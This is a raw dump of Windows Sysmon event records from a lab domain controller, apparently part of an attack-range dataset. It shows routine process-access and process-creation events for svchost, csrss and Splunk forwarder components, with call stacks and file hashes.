13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-436C-6000-F500-000000009A01}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-436C-6000-F500-000000009A01}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-436C-6000-F500-000000009A01}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.836{08A6967A-436D-6000-F600-000000009A01}50441180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-436D-6000-F600-000000009A01}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-436D-6000-F600-000000009A01}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.695{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-436D-6000-F600-000000009A01}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:17.696{08A6967A-436D-6000-F600-000000009A01}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.508{08A6967A-436E-6000-F700-000000009A01}45523604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-436E-6000-F700-000000009A01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:18.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 